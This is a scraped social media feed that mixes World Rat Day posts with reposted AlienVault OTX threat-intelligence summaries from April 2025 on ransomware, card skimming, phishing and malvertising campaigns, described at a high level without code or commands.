Congratulations Ronin! I hope you have lots of bananas, scritches and boops!
#rat #HeroRat
https://apopo.org/herorat-ronin-breaks-guinness-world-records-title/
It is apparently #WorldRatDay today 
#rat #rats
Wild rodents feed on the buds, flowers and seeds of a variety of invasive weeds, thus acting as biological control agents!
https://doi.org/10.17605/OSF.IO/DY7HE
This #video #footage is freely available through the #OpenScience Framework.
Additional #Documentary videos are available #FREE of charge from the same #source
Hunters International Shifts from Ransomware to Pure Data Extortion
Hunters International, which is a sophisticated ransomware operation suggesting
connections to the formerly dismantled Hive Ransomware group, has shifted to
pure data extortion from ransomware.
Pulse ID: 67f021613504c9bdb4a2c9f2
Pulse Link: https://otx.alienvault.com/pulse/67f021613504c9bdb4a2c9f2
Pulse Author: cryptocti
Created: 2025-04-04 18:13:53
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Silent Credit Card Thief Uncovered
A sophisticated credit card skimming campaign dubbed 'RolandSkimmer' has been discovered, targeting users in Bulgaria. The attack utilizes malicious browser extensions across Chrome, Edge, and Firefox, initiated through a deceptive LNK file. The malware employs obfuscated scripts to establish persistent access, harvesting and exfiltrating sensitive financial data. The attack workflow involves system reconnaissance, downloading additional malicious files, and injecting scripts into web pages. The threat actor uses unique identifiers to track victims and employs sophisticated techniques to evade detection. The campaign demonstrates the evolving nature of web-based credit card skimming threats, highlighting the need for enhanced security measures against LNK-based attacks and unverified browser extensions.
Pulse ID: 67efc6e92fbd533808f09435
Pulse Link: https://otx.alienvault.com/pulse/67efc6e92fbd533808f09435
Pulse Author: AlienVault
Created: 2025-04-04 11:47:53
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Where to Find Aspiring Hackers
This analysis delves into Proton66, a bulletproof hosting network enabling cybercrime operations and serving as a hub for aspiring cybercriminals. It focuses on a threat actor known as 'Coquettte' and their ties to the Horrid hacking group, a loosely organized cybercriminal collective. The investigation reveals a fake cybersecurity website, cybersecureprotect[.]com, which exposed its malicious infrastructure due to an OPSEC failure. Coquettte's activities include distributing malware, keyloggers, and trojans through Proton66's infrastructure. The research also uncovers other projects operated by this actor, including a website hosting guides for illegal activities. The analysis provides technical details of Coquettte's malware infrastructure and explores Proton66's role as a breeding ground for amateur threat actors.
Pulse ID: 67efe859080e7d3823c1d41e
Pulse Link: https://otx.alienvault.com/pulse/67efe859080e7d3823c1d41e
Pulse Author: AlienVault
Created: 2025-04-04 14:10:33
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
APT Targets South Korea with Deceptive PDF Lures
The Kimsuky APT group, also known as Black Banshee, has been actively targeting South Korean government entities using evolving tactics. Two distinct campaigns were uncovered, both utilizing government-themed PDF documents as lures. The infection chain begins with a phishing email containing a malicious LNK file attachment, which drops an obfuscated VBA script. This script then deploys additional files, including a PDF and a ZIP containing malicious components. The attacks involve sophisticated techniques such as Base64 encoding, obfuscation, and VM-aware evasion. The malware's functionalities include data exfiltration, cryptocurrency wallet theft, browser data extraction, keylogging, and establishing C2 communication. The campaigns demonstrate the group's continuous efforts to compromise South Korean targets using deceptive tactics and multi-stage malware.
Pulse ID: 67efe85af4503af2018d414e
Pulse Link: https://otx.alienvault.com/pulse/67efe85af4503af2018d414e
Pulse Author: AlienVault
Created: 2025-04-04 14:10:34
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
PoisonSeed Campaign Targets CRM and Bulk Email Providers in Supply Chain Spam Operation
The PoisonSeed campaign is targeting enterprise organizations and individuals outside the cryptocurrency industry by phishing CRM and bulk email provider credentials. The attackers export email lists and send bulk spam from compromised accounts, primarily to support cryptocurrency spam operations. The campaign uses a novel cryptocurrency seed phrase poisoning attack, providing security seed phrases to trick victims into copying them into new cryptocurrency wallets for future compromise. While similarities exist with Scattered Spider and CryptoChameleon groups, PoisonSeed is currently classified separately due to unique characteristics. The campaign has targeted companies like Coinbase, Ledger, Mailchimp, SendGrid, Hubspot, Mailgun, and Zoho, using sophisticated phishing techniques and automated processes to quickly exploit compromised accounts.
Pulse ID: 67ef8546d1d9ef9cd8e91906
Pulse Link: https://otx.alienvault.com/pulse/67ef8546d1d9ef9cd8e91906
Pulse Author: AlienVault
Created: 2025-04-04 07:07:50
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Enjoy a wee rat mini linocut for World Rat Day (invented by pet rat enthusiasts to challenge any rat stigma). They do actually make great pets.
Stripe API Skimming Campaign: Additional Victims & Insights
A sophisticated web skimming campaign has been discovered, utilizing a legacy Stripe API to validate stolen payment details before exfiltration. The attack involves multiple stages, including malicious loader injection, decoding, and skimming. Jscrambler's research team identified 49 affected merchants and uncovered additional domains potentially involved in the campaign. The skimmers are tailored for each targeted site and exploit vulnerabilities in e-commerce platforms. The attackers employ minimal obfuscation and transmit stolen data without encryption. The campaign has been active since August 2024, primarily targeting WooCommerce and WordPress sites. To protect against such attacks, merchants are advised to implement real-time webpage monitoring and adopt hardened iframe implementations.
Pulse ID: 67ef0694c316fa098bbc9279
Pulse Link: https://otx.alienvault.com/pulse/67ef0694c316fa098bbc9279
Pulse Author: AlienVault
Created: 2025-04-03 22:07:16
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Gootloader Returns: Malware Hidden in Google Ads for Legal Documents
The Gootloader malware campaign has evolved its tactics, now using Google Ads to target victims seeking legal templates. The threat actor advertises legal documents, primarily agreements, through compromised ad accounts. Users searching for templates are directed to a malicious website where they are prompted to enter their email address. They then receive an email with a link to download a seemingly legitimate document, which is actually a zipped .JS file containing malware. When executed, the malware creates a scheduled task and uses PowerShell to communicate with compromised WordPress blogs. The campaign demonstrates a shift in Gootloader's strategy, moving from poisoned search results to controlled infrastructure for malware delivery.
Pulse ID: 67ef0696f2790ccbd23c46a9
Pulse Link: https://otx.alienvault.com/pulse/67ef0696f2790ccbd23c46a9
Pulse Author: AlienVault
Created: 2025-04-03 22:07:18
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Threat Actor Deploys Ransomware Through Fake Zoom Download
A threat actor group leveraged a malicious zoom file to infiltrate corporate
environments. This was observed after this group silently targeted an corporate
environment for nine days before deploying dangerous blacksuite ransomware.
Pulse ID: 67ef2c7984e7a6c5db88a1d0
Pulse Link: https://otx.alienvault.com/pulse/67ef2c7984e7a6c5db88a1d0
Pulse Author: cryptocti
Created: 2025-04-04 00:48:56
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
New Crocodilus Malware Targets Android Devices
A new mobile banking app has been identified as trojan named “Crocodilus”.
Investigation of this malware shows that this malware employs new sophisticated
features including overlay attacks, accessibility-based data harvesting, remote
access trojan (RAT) functionalities and obfuscated remote control
mechanisms.
Pulse ID: 67ef2e498e6c86a6cd2ffe2c
Pulse Link: https://otx.alienvault.com/pulse/67ef2e498e6c86a6cd2ffe2c
Pulse Author: cryptocti
Created: 2025-04-04 00:56:41
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Hackers Use WRECKSTEEL to Steal Information from Computers
Ukrainian government agencies are facing targeted cyberattacks which are gained
by threat actor named UAC-0219 using information stealer WRECKSTEEL.
Pulse ID: 67ef237e2f35b330c2ab021c
Pulse Link: https://otx.alienvault.com/pulse/67ef237e2f35b330c2ab021c
Pulse Author: cryptocti
Created: 2025-04-04 00:10:38
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Thunderstruck! Malicious ads for RVTools lead to ThunderShell payload
A security incident involving malicious sponsored ads distributing backdoored administrative tools was detected. Users searching for RVTools were served a tampered version containing ThunderShell, a PowerShell-based remote access tool. The malicious ads, appearing in Google search results, led to a site mimicking the legitimate RVTools download page. The trojanized file, when executed, installs RVTools but also deploys ThunderShell, allowing attackers to execute commands on compromised machines. Multiple ads from different verified advertisers were used to evade security controls. The campaign highlights the persistent threat of malvertising and the need for stronger ad screening processes and user awareness.
Pulse ID: 67eec2ff4d0da82ea2ee1e26
Pulse Link: https://otx.alienvault.com/pulse/67eec2ff4d0da82ea2ee1e26
Pulse Author: AlienVault
Created: 2025-04-03 17:18:55
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Threat actors leverage tax season to deploy tax-themed phishing campaigns
Microsoft has observed several phishing campaigns using tax-related themes to steal credentials and deploy malware as Tax Day approaches in the United States. These campaigns use redirection methods like URL shorteners and QR codes in malicious attachments, and abuse legitimate services to avoid detection. They lead to phishing pages delivered via RaccoonO365 platform, remote access trojans like Remcos, and other malware such as Latrodectus, BruteRatel C4, AHKBot, and GuLoader. The campaigns target various sectors including engineering, IT, consulting, and accounting firms. Threat actors use social engineering techniques to mislead taxpayers into revealing sensitive information, making payments to fake services, or installing malicious payloads. Microsoft provides detailed mitigation and protection guidance to help users and organizations defend against these tax-centric threats.
Pulse ID: 67eec31b26a9b5d94190be7d
Pulse Link: https://otx.alienvault.com/pulse/67eec31b26a9b5d94190be7d
Pulse Author: AlienVault
Created: 2025-04-03 17:19:23
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Cyber Espionage using PowerShell stealer WRECKSTEEL
Ukrainian government's CERT-UA has identified a series of cyberattacks against government agencies and critical infrastructure facilities in Ukraine during March 2025. The attacks, aimed at information theft, utilize compromised accounts to distribute emails with links to public file services. These links download a VBScript loader, which then launches a PowerShell script to search and upload specific file types using cURL. The malicious activity, tracked as UAC-0219, has been ongoing since fall 2024. The primary tool, classified as WRECKSTEEL, exists in both VBScript and PowerShell versions. Earlier attacks in 2024 used EXE files created with NSIS installers, containing decoy documents and the IrfanView program for screenshots. CERT-UA urges immediate reporting of any detected cyberattack signs.
Pulse ID: 67eed31e2e5388397fc6bf7e
Pulse Link: https://otx.alienvault.com/pulse/67eed31e2e5388397fc6bf7e
Pulse Author: AlienVault
Created: 2025-04-03 18:27:42
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
TookPS distributed under the guise of UltraViewer, AutoCAD, and Ableton
A malware campaign is distributing the TookPS downloader by impersonating popular software like UltraViewer, AutoCAD, SketchUp, Ableton, and Quicken. The malware establishes an SSH tunnel for remote access and deploys additional payloads like TeviRat and Lapmon backdoors. The attackers gain full system control through various methods. The campaign targets both individuals and organizations, using domains registered in early 2024. Users are advised to avoid downloading pirated software, while organizations should implement strict security policies and conduct regular awareness training.
Pulse ID: 67eea35a7cea57b67d9c3172
Pulse Link: https://otx.alienvault.com/pulse/67eea35a7cea57b67d9c3172
Pulse Author: AlienVault
Created: 2025-04-03 15:03:54
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Amateur Hacker Leverages Bulletproof Hosting Server to Spread Malware
A novice cybercriminal, known as 'Coquettte', has been discovered using a Russian bulletproof hosting provider, Proton66, to distribute malware. The hacker's activities include deploying the Rugmi malware loader through a fake cybersecurity product website and selling guides for illegal substances and weapons. Coquettte is believed to be part of a loosely structured hacking collective called Horrid. The threat actor's infrastructure spans multiple domains and platforms, including GitHub, YouTube, and Last.fm. This network appears to serve as an incubator for aspiring cybercriminals, offering malware resources, hosting solutions, and a collaborative environment for underground hacking activities.
Pulse ID: 67eec2fef6857d8d79dbb7e6
Pulse Link: https://otx.alienvault.com/pulse/67eec2fef6857d8d79dbb7e6
Pulse Author: AlienVault
Created: 2025-04-03 17:18:54
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
